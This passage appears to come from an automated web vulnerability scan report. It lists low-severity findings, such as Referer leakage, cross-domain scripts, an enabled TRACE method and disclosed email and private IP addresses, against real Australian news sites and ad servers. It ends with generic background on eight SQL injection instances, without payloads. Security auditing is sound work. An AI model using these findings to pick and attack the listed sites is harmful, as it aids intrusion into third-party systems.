9.62. http://r1-ads.ace.advertising.com/site=801647/size=300250/u=2/bnum=35058392/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

9.63. http://rc.d.chango.com/m/rc

9.64. http://rp.gwallet.com/r1/ruum

9.65. http://statse.webtrendslive.com/dcsfoa7no000004nwf1r8lgm7_4i7i/dcs.gif

9.66. http://statse.webtrendslive.com/dcsw4t3cy00000ctu0wdzjrq1_3q8k/dcs.gif

9.67. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

9.68. http://tap.rubiconproject.com/oz/feeds/targus/profile

9.69. http://user.lucidmedia.com/clicksense/user

9.70. http://web.adblade.com/imps.php

9.71. http://www.abc.net.au/includes/scripts/global.js

9.72. http://www.abc.net.au/local/global_css/common_modules/house_ads_m12.css

9.73. http://www.abc.net.au/local/global_css/common_modules/latest_media_m21.css

9.74. http://www.abc.net.au/local/global_css/common_modules/m60_login.css

9.75. http://www.abc.net.au/local/global_css/common_modules/river_of_content_m20.css

9.76. http://www.abc.net.au/local/global_css/common_modules/site_search_m3.css

9.77. http://www.abc.net.au/local/global_css/common_modules/top_stories_m14.css

9.78. http://www.abc.net.au/local/global_css/news/styles.css

9.79. http://www.abc.net.au/local/global_css/palettes/generic.css

9.80. http://www.abc.net.au/local/global_css/palettes/paletteA.css

9.81. http://www.abc.net.au/local/global_css/styles.css

9.82. http://www.abc.net.au/local/global_css/template/styles.css

9.83. http://www.abc.net.au/local/global_css/yaml/central_draft.css

9.84. http://www.abc.net.au/local/global_css/yaml/core/slim_base.css

9.85. http://www.abc.net.au/local/global_scripts/contribute/functions.js

9.86. http://www.abc.net.au/local/global_scripts/general.min.js

9.87. http://www.abc.net.au/local/includes/scripts/city_include.js

9.88. http://www.abc.net.au/local/includes/scripts/jquery/plugins/jquery.tools.min.js

9.89. http://www.abc.net.au/local/includes/scripts/tabs_latest_media.js

9.90. http://www.abc.net.au/res/abc/styles/screen.css

9.91. http://www.abc.net.au/res/libraries/abcjs/abc.js

9.92. http://www.abc.net.au/res/libraries/jquery/jquery-latest.min.js

9.93. http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js

9.94. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

9.95. http://www.investsmart.com.au/promostrip/images/Norm_house120.jpg

9.96. http://www.wtp101.com/pull_sync

10. Password field with autocomplete enabled

10.1. http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js

10.2. http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html

11. ASP.NET debugging enabled

12. Referer-dependent response

12.1. http://ad.yieldmanager.com/imp

12.2. http://adnxs.revsci.net/imp

12.3. http://www.facebook.com/connect/connect.php

12.4. http://www.facebook.com/plugins/like.php

12.5. http://www.facebook.com/plugins/likebox.php

12.6. http://www.facebook.com/plugins/recommendations.php

13. Cross-domain POST

13.1. http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884

13.2. http://www.smh.com.au/business

14. Cross-domain Referer leakage

14.1. http://ad-apac.doubleclick.net/adj/onl.smh.bus/bus/homepage

14.2. http://ad-apac.doubleclick.net/adj/onl.wa.news/news/homepage

14.3. http://ad.agkn.com/iframe!t=1131!

14.4. http://ad.au.doubleclick.net/adi/N5960.283587.YAHOONEWSAU/B5726304.3

14.5. http://ad.au.doubleclick.net/adi/N799.Yahoo1/B4631682.16

14.6. http://ad.au.doubleclick.net/adi/N799.Yahoo1/B4631682.16

14.7. http://ad.au.doubleclick.net/adj/ndm.news/news/breakingnews

14.8. http://ad.au.doubleclick.net/adj/ndm.news/news/breakingnews

14.9. http://ad.au.doubleclick.net/adj/ndm.news/news/weather

14.10. http://ad.au.doubleclick.net/adj/ndm.news/news/weather

14.11. http://ad.au.doubleclick.net/adj/ndm.ntn/news/home

14.12. http://ad.au.doubleclick.net/adj/ndm.ntn/news/home

14.13. http://ad.au.doubleclick.net/adj/ndm.ntn/news/local

14.14. http://ad.au.doubleclick.net/adj/ndm.ntn/news/local

14.15. http://ad.au.doubleclick.net/adj/ndm.tmrc/news/home

14.16. http://ad.au.doubleclick.net/adj/ndm.tmrc/news/local

14.17. http://ad.au.doubleclick.net/adj/ndm.tst/business/businessold/news

14.18. http://ad.doubleclick.net/adi/N3753.158901.DATAXU/B5319162.2

14.19. http://ad.doubleclick.net/adi/N3753.158901.DATAXU/B5319162.9

14.20. http://ad.doubleclick.net/adi/N6560.159469.AOD-INVITE/B5795406.3

14.21. http://ad.turn.com/server/ads.js

14.22. http://ad.yieldmanager.com/iframe3

14.23. http://ad.yieldmanager.com/iframe3

14.24. http://ad.yieldmanager.com/iframe3

14.25. http://au.pfinance.yahoo.com/compare/distribution/wan-widget/

14.26. http://cm.g.doubleclick.net/pixel

14.27. http://cm.g.doubleclick.net/pixel

14.28. http://cm.g.doubleclick.net/pixel

14.29. http://cms.ad.yieldmanager.net/v1/cms

14.30. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.31. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.32. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.33. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.34. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.35. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.36. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.37. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.38. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.39. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.40. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.41. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

14.42. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

14.43. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

14.44. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

14.45. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

14.46. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

14.47. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

14.48. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

14.49. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

14.50. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

14.51. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

14.52. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

14.53. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

14.54. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

14.55. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

14.56. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

14.57. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

14.58. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

14.59. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

14.60. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

14.61. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

14.62. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

14.63. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

14.64. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html

14.65. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html

14.66. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html

14.67. http://pixel.invitemedia.com/rubicon_sync

14.68. http://resources.news.com.au/cs/library/modules/jquery-socialise/plugins/linkedin/iframe.html

14.69. http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html

14.70. http://tools.themercury.com.au/feeds/feed-with-lead.php

14.71. http://tools.themercury.com.au/feeds/feed-with-lead.php

14.72. http://weather.news.com.au/widgets/local/

14.73. http://weather.news.com.au/widgets/monthly-almanac/

14.74. http://weather.news.com.au/widgets/radar/

14.75. http://weather.news.com.au/widgets/satellite/

14.76. http://web.adblade.com/imps.php

14.77. http://www.abc.net.au/news/2011-09-07/christmas-island-inquest-reopens/2875554/

14.78. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

14.79. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

14.80. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

14.81. http://www.facebook.com/connect/connect.php

14.82. http://www.facebook.com/plugins/likebox.php

14.83. http://www.facebook.com/plugins/likebox.php

14.84. http://www.facebook.com/plugins/likebox.php

14.85. http://www.facebook.com/plugins/recommendations.php

14.86. http://www.google.com/search

14.87. http://www.news.com.au/breaking-news

14.88. http://www.weatherchannel.com.au/weather-widget.aspx

15. Cross-domain script include

15.1. http://ad.au.doubleclick.net/adi/N799.Yahoo1/B4631682.16

15.2. http://ad.doubleclick.net/adi/N6560.159469.AOD-INVITE/B5795406.3

15.3. http://ad.yieldmanager.com/iframe3

15.4. http://ad.yieldmanager.com/iframe3

15.5. http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/

15.6. http://au.news.yahoo.com/thewest/business/

15.7. http://au.pfinance.yahoo.com/compare/distribution/wan-widget/

15.8. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

15.9. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=68910242/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS072e9051ae61480d8af8a5a920c43596/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

15.10. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

15.11. http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html

15.12. http://news.smh.com.au/favicon.ico

15.13. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

15.14. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

15.15. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

15.16. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

15.17. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

15.18. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

15.19. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

15.20. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

15.21. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

15.22. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

15.23. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

15.24. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

15.25. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

15.26. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

15.27. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html

15.28. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html

15.29. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html

15.30. http://resources.news.com.au/cs/library/modules/jquery-socialise/plugins/linkedin/iframe.html

15.31. http://resources.smh.com.au/common/media-common-1.0/js/fdjsf/output/fd.registrars_min.js

15.32. http://resources.watoday.com.au/common/media-common-1.0/js/fdjsf/output/fd.registrars.homepage_min.js

15.33. http://resources.watoday.com.au/common/media-common-1.0/js/fdjsf/output/fd.registrars_min.js

15.34. http://weather.news.com.au/wa/perth/perth

15.35. http://weather.news.com.au/widgets/local/

15.36. http://weather.news.com.au/widgets/monthly-almanac/

15.37. http://weather.news.com.au/widgets/radar/

15.38. http://weather.news.com.au/widgets/satellite/

15.39. http://web.adblade.com/imps.php

15.40. http://www.6pr.com.au/

15.41. http://www.6pr.com.au/blogs/6pr-perth-blog/claws-out-for-cat-laws/20110907-1jwus.html

15.42. http://www.6pr.com.au/not_found.html

15.43. http://www.6pr.com.au/trolls-attack-shark-victim/20110907-1jxqv.html

15.44. http://www.7perth.com.au/view/2/

15.45. http://www.7perth.com.au/view/about/

15.46. http://www.7perth.com.au/view/seven-news/

15.47. http://www.abc.net.au/news/2011-09-07/christmas-island-inquest-reopens/2875554/

15.48. http://www.facebook.com/connect/connect.php

15.49. http://www.facebook.com/plugins/likebox.php

15.50. http://www.news.com.au/breaking-news

15.51. http://www.ntnews.com.au/

15.52. http://www.ntnews.com.au/article/2011/09/07/258681_ntnews.html

15.53. http://www.perthnow.com.au/

15.54. http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884

15.55. http://www.smh.com.au/business

15.56. http://www.themercury.com.au/

15.57. http://www.themercury.com.au/article/2011/09/07/259671_tasmania-news.html

15.58. http://www.watoday.com.au/

15.59. http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html

15.60. http://www.weatherchannel.com.au/weather-widget.aspx

16. TRACE method is enabled

16.1. http://bh.contextweb.com/

16.2. http://image2.pubmatic.com/

16.3. http://m.xp1.ru4.com/

16.4. http://matcher-rbc.bidder7.mookie1.com/

16.5. http://optimized-by.rubiconproject.com/

16.6. http://pixel.rubiconproject.com/

16.7. http://secure-au.imrworldwide.com/

16.8. http://tap.rubiconproject.com/

16.9. http://www.7perth.com.au/

17. Email addresses disclosed

17.1. http://ajax.googleapis.com/ajax/libs/scriptaculous/1.9/controls.js

17.2. http://feeds.mycareer.com.au/jobresults

17.3. http://media.mytalk.com.au/6pr/audio/paul_papalia_070911.mp3

17.4. http://media.news.com.au/cs/newscomau/v1.5/base-patch-v2.js

17.5. http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/fd.mt.mytalknetwork.js

17.6. http://resources1.news.com.au/cs/network/js/library/base-modules-concat-min.js

17.7. http://weather.news.com.au/includes/optigraph/optigraph.min.js

17.8. http://weather.news.com.au/includes/optigraph/thermometer.min.js

17.9. http://www.7perth.com.au/js/wforms.js

17.10. http://www.7perth.com.au/view/2/

17.11. http://www.7perth.com.au/view/seven-news/

17.12. http://www.abc.net.au/includes/scripts/jquery/plugins/jquery.hoverIntent.minified.js

17.13. http://www.bcl.com.au/highlight.js

17.14. http://www.ntnews.com.au/scripts/form-validate.js

17.15. http://www.ntnews.com.au/scripts/global.js

17.16. http://www.perthnow.com.au/

17.17. http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884

17.18. http://www.themercury.com.au/scripts/form-validate.js

17.19. http://www.watoday.com.au/

17.20. http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html

18. Private IP addresses disclosed

18.1. http://connect.facebook.net/en_GB/all.js

18.2. http://external.ak.fbcdn.net/safe_image.php

18.3. http://external.ak.fbcdn.net/safe_image.php

18.4. http://media.news.com.au/news/2011/07-jul/business-markets/js/ndm.newscomau.marketstatusservice.js

18.5. http://static.ak.fbcdn.net/connect/xd_proxy.php

18.6. http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/Ii1cTFrq_I2.js

18.7. http://www.facebook.com/connect/connect.php

18.8. http://www.facebook.com/connect/connect.php

18.9. http://www.facebook.com/extern/login_status.php

18.10. http://www.facebook.com/extern/login_status.php

18.11. http://www.facebook.com/extern/login_status.php

18.12. http://www.facebook.com/extern/login_status.php

18.13. http://www.facebook.com/extern/login_status.php

18.14. http://www.facebook.com/extern/login_status.php

18.15. http://www.facebook.com/plugins/like.php

18.16. http://www.facebook.com/plugins/like.php

18.17. http://www.facebook.com/plugins/like.php

18.18. http://www.facebook.com/plugins/like.php

18.19. http://www.facebook.com/plugins/like.php

18.20. http://www.facebook.com/plugins/like.php

18.21. http://www.facebook.com/plugins/like.php

18.22. http://www.facebook.com/plugins/like.php

18.23. http://www.facebook.com/plugins/likebox.php

18.24. http://www.facebook.com/plugins/likebox.php

18.25. http://www.facebook.com/plugins/likebox.php

18.26. http://www.facebook.com/plugins/likebox.php

18.27. http://www.facebook.com/plugins/recommendations.php

18.28. http://www.google.com/sdch/StnTz5pY.dct

19. Robots.txt file

19.1. http://a.analytics.yahoo.com/fpc.pl

19.2. http://ad.turn.com/server/pixel.htm

19.3. http://ad.yieldmanager.com/imp

19.4. http://adfarm.mediaplex.com/ad/js/9608-119290-2042-5

19.5. http://adsfac.us/ag.asp

19.6. http://api.twitter.com/1/statuses/user_timeline.json

19.7. http://au.adserver.yahoo.com/a

19.8. http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/

19.9. http://au.pfinance.yahoo.com/compare/distribution/wan-widget/

19.10. http://b.scorecardresearch.com/beacon.js

19.11. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

19.12. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

19.13. http://cdn.turn.com/server/ddc.htm

19.14. http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46

19.15. http://cm.au.thewest.overture.com/js_flat_1_0/

19.16. http://content.yieldmanager.edgesuite.net/atoms/14/8d/69/e5/148d69e533c1134c3b11f6d485608.swf

19.17. http://d3.zedo.com/jsc/d3/ff2.html

19.18. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js

19.19. http://data.weatherzone.com.au/json/animator/

19.20. http://g-pixel.invitemedia.com/gmatcher

19.21. http://g.ca.bid.invitemedia.com/rubicon_imp

19.22. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/vj

19.23. http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.swf

19.24. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

19.25. http://l.addthiscdn.com/live/t00/250lo.gif

19.26. http://m.xp1.ru4.com/activity

19.27. http://map.media6degrees.com/orbserv/hbpix

19.28. http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html

19.29. http://pagead2.googlesyndication.com/pagead/imgad

19.30. http://pixel.adblade.com/log.php

19.31. http://pixel.invitemedia.com/data_sync

19.32. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

19.33. http://row.bc.yahoo.com/b

19.34. http://s0.2mdn.net/2878385/rsvp_type_300x125.swf

19.35. http://s1.2mdn.net/2977403/Yahoo_Homeroom_Texas_300x250.swf

19.36. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.37. http://sync.mathtag.com/sync/img

19.38. http://tags.mathtag.com/view/js/

19.39. http://traktr.news.com.au/esi/traktr.js

19.40. http://web.adblade.com/imps.php

19.41. http://webservice.theweather.com.au/crossdomain.xml

19.42. http://www.6pr.com.au/

19.43. http://www.7perth.com.au/view/seven-news/

19.44. http://www.abc.net.au/perth/news/

19.45. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

19.46. http://www.bcl.com.au/perth/news.htm

19.47. http://www.facebook.com/extern/login_status.php

19.48. http://www.google-analytics.com/__utm.gif

19.49. http://www.news.com.au/mercury/images/bg-local-guides.gif

19.50. http://www.perthnow.com.au/

19.51. http://www.smh.com.au/images/promo/St_George_logo60x26.jpg

19.52. http://www.themercury.com.au/

19.53. http://www.watoday.com.au/

20. HTML does not specify charset

20.1. http://ad.au.doubleclick.net/adi/N5960.283587.YAHOONEWSAU/B5726304.3

20.2. http://ad.au.doubleclick.net/adi/N799.Yahoo1/B4631682.16

20.3. http://ad.doubleclick.net/adi/N3753.158901.DATAXU/B5319162.2

20.4. http://ad.doubleclick.net/adi/N3753.158901.DATAXU/B5319162.9

20.5. http://ad.yieldmanager.com/iframe3

20.6. http://cti.w55c.net/ct/cms-2-frame.html

20.7. http://cti.w55c.net/ct/rubicon-cms2.html

20.8. http://d3.zedo.com/jsc/d3/ff2.html

20.9. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

20.10. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

20.11. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

20.12. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html

20.13. http://pixel.invitemedia.com/data_sync

20.14. http://pixel.invitemedia.com/rubicon_sync

20.15. http://resources.6pr.f2.com.au/myTalkNetwork/6pr/css/img/bg_weather.gif

20.16. http://resources.smh.com.au/common/media-common-1.0/css/output/common.skin.breakingnewsnational_min.css

20.17. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/02/06/tn_165705.jpg/%22

20.18. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/07/13/tn_197121.jpg/%22

20.19. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/23/tn_203731.jpg/%22

20.20. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/25/tn_204251.jpg/%22

20.21. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/30/tn_205931.jpg/%22

20.22. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/09/02/tn_206341.jpg/%22

20.23. http://tools.ntnews.com.au/favicon.ico

20.24. http://tools.ntnews.com.au/feeds/feed-breakingnews-datelist.php

20.25. http://tools.ntnews.com.au/photo-gallery/photo_galleries_js.php

20.26. http://tools.ntnews.com.au/search-results/adsense_frontpage_js.php

20.27. http://tools.ntnews.com.au/search-results/adsense_frontpage_js3.php

20.28. http://tools.ntnews.com.au/weather/weather_panel.php

20.29. http://tools.ntnews.com.au/yoursay/article_page_comments.php

20.30. http://tools.ntnews.com.au/yoursay/article_single_comment.php

20.31. http://tools.themercury.com.au/feeds/feed-ticker.php

20.32. http://tools.themercury.com.au/feeds/feed-with-lead.php

20.33. http://tools.themercury.com.au/misc/datetime.php

20.34. http://tools.themercury.com.au/photo-gallery/featuredgallery.php

20.35. http://tools.themercury.com.au/search-results/adsense_js.php

20.36. http://tools.themercury.com.au/search-results/adsense_wide_js_skip3.php

20.37. http://tools.themercury.com.au/video/featuredvideo.php

20.38. http://tools.themercury.com.au/weather/weather_inc.php

20.39. http://tools.themercury.com.au/yoursay/article_page_comments.php

20.40. http://tools.themercury.com.au/yoursay/yoursay-single-extract.php

20.41. http://uac.advertising.com/wrapper/aceUACping.htm

20.42. http://weather.news.com.au/wa/perth/perth

20.43. http://weather.news.com.au/widgets/local/

20.44. http://weather.news.com.au/widgets/monthly-almanac/

20.45. http://weather.news.com.au/widgets/radar/

20.46. http://weather.news.com.au/widgets/satellite/

20.47. http://www.abc.net.au/res/abc/submenus.htm

20.48. http://www.bcl.com.au/perth/news.htm

21. Content type incorrectly stated

21.1. http://a3.twimg.com/profile_images/195539297/6PRlogo-Thumbnail-48x48_normal.gif

21.2. http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090

21.3. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList

21.4. http://news.smh.com.au/action/pingServerAction

21.5. http://resources.news.com.au/cs/newscomau/images/favicon.ico

21.6. http://resources.news.com.au/cs/perthnow/images/favicon.ico

21.7. http://resources0.news.com.au/images/2010/06/15/1225879/957752-wine-glass.gif

21.8. http://resources2.news.com.au/images/2011/08/01/1226106/127606-economy.gif

21.9. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/23/tn_203731.jpg/%22

21.10. http://tools.ntnews.com.au/feeds/feed-breakingnews-datelist.php

21.11. http://tools.ntnews.com.au/photo-gallery/photo_galleries_js.php

21.12. http://tools.ntnews.com.au/search-results/adsense_frontpage_js.php

21.13. http://tools.ntnews.com.au/search-results/adsense_frontpage_js3.php

21.14. http://tools.ntnews.com.au/weather/weather_panel.php

21.15. http://tools.ntnews.com.au/yoursay/article_page_comments.php

21.16. http://tools.ntnews.com.au/yoursay/article_single_comment.php

21.17. http://tools.themercury.com.au/feeds/feed-ticker.php

21.18. http://tools.themercury.com.au/feeds/feed-with-lead.php

21.19. http://tools.themercury.com.au/misc/datetime.php

21.20. http://tools.themercury.com.au/photo-gallery/featuredgallery.php

21.21. http://tools.themercury.com.au/search-results/adsense_js.php

21.22. http://tools.themercury.com.au/search-results/adsense_wide_js_skip3.php

21.23. http://tools.themercury.com.au/video/featuredvideo.php

21.24. http://tools.themercury.com.au/weather/weather_inc.php

21.25. http://tools.themercury.com.au/yoursay/article_page_comments.php

21.26. http://tools.themercury.com.au/yoursay/yoursay-single-extract.php

21.27. http://www.7perth.com.au/javascript.js

21.28. http://www.abc.net.au/favicon.ico

21.29. http://www.abc.net.au/res/abc/submenus.htm

21.30. http://www.bcl.com.au/perth/x-topimg.txt

21.31. http://www.bcl.com.au/x-footer.txt

21.32. http://www.facebook.com/extern/login_status.php

21.33. http://www.ntnews.com.au/images/global/icons/arrow-orange.gif

21.34. http://www.ntnews.com.au/scripts/track-call.js

21.35. http://www.ntnews.com.au/scripts/track-header.js

21.36. http://www.smh.com.au/action/pingServerAction

21.37. http://www.smh.com.au/favicon.ico

21.38. http://www.themercury.com.au/images/horoscopes-background.gif

21.39. http://www.themercury.com.au/scripts/track-call.js

21.40. http://www.themercury.com.au/scripts/track-header.js

21.41. http://www.watoday.com.au/action/pingServerAction

22. Content type is not specified

22.1. http://ad.yieldmanager.com/st

22.2. http://pcm3.map.pulsemgr.com/uds/pc



1. SQL injection  next
There are 8 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

